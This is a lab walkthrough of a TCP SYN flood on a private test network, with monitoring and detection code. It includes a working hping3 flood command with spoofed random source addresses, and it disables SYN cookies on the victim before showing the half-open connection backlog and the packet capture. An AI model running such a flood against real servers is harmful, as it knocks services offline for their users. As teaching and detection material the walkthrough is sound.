Lab > TCP SYN flooding
1. Install packages
Victim2# yum -y install httpd python3
2. Start the web server
Victim2# systemctl start httpd
3. Disconnect the network
To use the --rand-source option, configure the victim so it cannot reach the external network (remove the default gateway).
Victim2# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.108.2 0.0.0.0 UG 100 0 0 ens33
192.168.108.0 0.0.0.0 255.255.255.0 U 100 0 0 ens33
Victim2# route del default gw 192.168.108.2
Victim2# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.108.0 0.0.0.0 255.255.255.0 U 100 0 0 ens33
4. Disable SYN cookies
/proc/sys/net/ipv4/tcp_syncookies : 0 = disabled
/proc/sys/net/ipv4/tcp_syncookies : 1 = enabled
Victim2# echo 0 > /proc/sys/net/ipv4/tcp_syncookies
5. Monitoring
Victim2# vi netstatTest.py
-- netstatTest.py --
#!/usr/bin/env python3
import os
import time

sleepTime = 5  # seconds between refreshes
count = 1
cmd = ('clear', 'netstat -nat | grep -v LISTEN')  # netstat is provided by net-tools

# Infinite loop: redraw the connection table every sleepTime seconds
while True:
    os.system(cmd[0])  # clear the screen
    print(f"===> count : {count}, sleep time : {sleepTime} <===")
    os.system(cmd[1])  # run netstat
    count += 1  # increment the refresh counter
    time.sleep(sleepTime)  # sleep for sleepTime seconds
-- netstatTest.py --
Victim2# chmod 755 netstatTest.py
Victim2# ./netstatTest.py
===> count : 41, sleep time : 5 <===
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 84 192.168.108.100:22 192.168.108.1:1339 ESTABLISHED
tcp 353 0 192.168.108.104:50716 192.168.108.102:4444 CLOSE_WAIT
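The monitoring script above only redraws the table; the following added example (not part of the original post) turns the same `netstat -nat` output into a detection check. It counts SYN_RECV entries per local port and counts distinct peers, so a backlog built from many different source addresses (the --rand-source pattern) can be told apart from one built by a single host. The sample lines are constructed here in the page's netstat layout; the threshold is an assumed value.

```python
import re
from collections import Counter

# Constructed sample in the layout of `netstat -nat | grep -v LISTEN` (not real output).
SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 84 192.168.108.100:22 192.168.108.1:1339 ESTABLISHED
tcp 0 0 192.168.108.100:80 192.168.108.102:4406 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4451 SYN_RECV
tcp 0 0 192.168.108.100:80 10.77.3.9:57628 SYN_RECV
tcp 0 0 192.168.108.100:80 172.19.4.1:4390 SYN_RECV
"""

# proto recv-q send-q local:port foreign:port state  (lines with ':*' never match)
LINE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)$")

def half_open_by_port(text):
    """Return {local_port: (syn_recv_count, distinct_peer_count)} from netstat text."""
    per_port = {}
    for line in text.splitlines():
        m = LINE.match(line)
        if not m or m.group(5) != "SYN_RECV":
            continue
        lport, peer = int(m.group(2)), m.group(3)
        cnt, peers = per_port.get(lport, (0, set()))
        per_port[lport] = (cnt + 1, peers | {peer})
    return {p: (c, len(s)) for p, (c, s) in per_port.items()}

def assess(text, threshold=64):
    """Flag ports whose half-open backlog reaches the (assumed) threshold and
    say whether the peers look like many spoofed sources or a few real ones."""
    findings = []
    for port, (count, peers) in half_open_by_port(text).items():
        if count >= threshold:
            kind = ("many distinct sources (random-source pattern)"
                    if peers > count // 2 else "few sources")
            findings.append((port, count, kind))
    return findings
```

Run it in place of the bare `os.system(cmd[1])` call, or feed it the captured output of the script, and alert when `assess` returns a non-empty list.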
6. Attack
hping3 options
-S : set the SYN flag
-c : count (number of packets)
-p : destination port
--flood : send as fast as possible
--rand-source : random source address
Run the test while the network is disconnected.
Attacker# hping3 -c 100000 -p 80 -S 192.168.108.100 --rand-source --flood
===> count : 6, sleep time : 5 <===
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.108.100:80 192.168.108.102:4406 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4451 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57628 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4390 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4259 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4353 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4189 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57615 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57614 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4174 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4542 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4368 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4386 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4462 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4279 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4193 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4359 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4284 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4190 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4289 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57618 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4261 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57822 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57619 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57647 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8180 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7921 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7858 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:410 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8154 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7899 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7979 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8146 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7920 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57667 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63570 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8047 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7991 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63465 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7982 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7966 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7917 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8018 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8019 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7847 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7889 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7990 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7918 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63469 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8191 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63462 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8050 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63415 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8027 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63405 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8298 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7980 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8167 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57616 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8189 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8185 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:408 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8153 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8134 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63571 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:411 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8343 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8138 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8137 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8067 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7986 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8176 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8196 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8038 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8016 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8122 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63463 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8258 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57650 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8121 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63464 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8478 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8296 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57649 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8177 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8385 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8239 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57826 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8147 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57617 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8236 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8083 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:409 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8192 SYN_RECV
tcp 0 0 192.168.108.100:22 192.168.108.1:1339 ESTABLISHED
tcp 353 0 192.168.108.104:50716 192.168.108.102:4444 CLOSE_WAIT
^C
7. Re-enable the gateway
Victim2# route add default gw 192.168.108.2 dev ens33
Victim2# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.108.2 0.0.0.0 UG 0 0 0 ens33
192.168.108.0 0.0.0.0 255.255.255.0 U 100 0 0 ens33
8. Packet dump
Capture the packets, save them to a file, and analyze them.
Save the packets from 192.168.108.102 arriving on the ens33 interface to the file tcpSynFlooding.pcap.
Victim2# tcpdump -i ens33 -w tcpSynFlooding.pcap host 192.168.108.102
tcpdump: listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
Attacker# time hping3 -c 100000 -p 80 -S 192.168.108.100 --flood
HPING 192.168.108.100 (eth0 192.168.108.100): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- 192.168.108.100 hping statistic ---
1093365 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
real 0m15.133s
user 0m0.077s
sys 0m15.312s
tcpdump: listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
^C373588 packets captured
1246417 packets received by filter
872828 packets dropped by kernel
Download the dumped packets to the host OS and analyze them in Wireshark.
http://192.168.108.100/tcpSynFlooding.pcap
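Wireshark will show the flood as a wall of SYNs with no completing ACKs. The added example below (not part of the original post, and not the page's own capture) does that analysis programmatically: it parses a pcap file with only the standard library, replays the handshake per client and reports how many half-open entries remain, which is what the SYN_RECV rows in the netstat output correspond to. The capture it analyzes is constructed inline: one legitimate handshake plus 300 SYNs from spoofed 10.0.x.x sources aimed at the victim address used on this page.

```python
import struct
from collections import Counter
SYN, ACK = 0x02, 0x10

def eth_ip_tcp(src, dst, sport, dport, flags):
    """Build one Ethernet/IPv4/TCP frame (no options, no payload, zero checksums)."""
    ip4 = lambda a: bytes(int(o) for o in a.split("."))
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0, ip4(src), ip4(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    return eth + ip + tcp

def pcap_bytes(frames):
    """Wrap frames in a little-endian pcap file (LINKTYPE_ETHERNET = 1)."""
    head = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    return head + b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)

def half_open_report(data, victim_port=80):
    """Replay the handshake per (client IP, client port): a SYN opens a half-open entry,
    the client's later pure ACK closes it. Returns Counter{client IP: still half-open}."""
    end = "<" if struct.unpack("<I", data[:4])[0] == 0xA1B2C3D4 else ">"
    pending, off = {}, 24
    while off + 16 <= len(data):
        incl = struct.unpack(end + "IIII", data[off:off + 16])[2]
        f, off = data[off + 16:off + 16 + incl], off + 16 + incl
        if len(f) < 34 or f[12:14] != b"\x08\x00" or f[23] != 6:
            continue  # not IPv4 over Ethernet, or not TCP
        tcp = f[14 + (f[14] & 0x0F) * 4:]
        if len(tcp) < 14:
            continue
        sport, dport = struct.unpack("!HH", tcp[:4])
        if dport != victim_port:
            continue  # only segments sent to the server port matter here
        key = (".".join(map(str, f[26:30])), sport)
        flags = tcp[13]
        if flags & SYN and not flags & ACK:
            pending[key] = True
        elif flags & ACK and not flags & SYN:
            pending.pop(key, None)
    return Counter(ip for ip, _ in pending)

def demo():
    """Constructed capture: one completed handshake plus 300 SYNs from spoofed sources."""
    victim = "192.168.108.100"
    frames = [eth_ip_tcp("192.168.108.1", victim, 40000, 80, SYN),
              eth_ip_tcp("192.168.108.1", victim, 40000, 80, ACK)]
    frames += [eth_ip_tcp(f"10.0.{i >> 8}.{i & 255}", victim, 1000 + i, 80, SYN)
               for i in range(300)]
    return half_open_report(pcap_bytes(frames))
```

To analyze a real capture such as tcpSynFlooding.pcap, pass `open(path, "rb").read()` to `half_open_report`; a flood from a single unspoofed host shows up as one IP with a very large count, while --rand-source traffic shows up as many IPs with a count of one each.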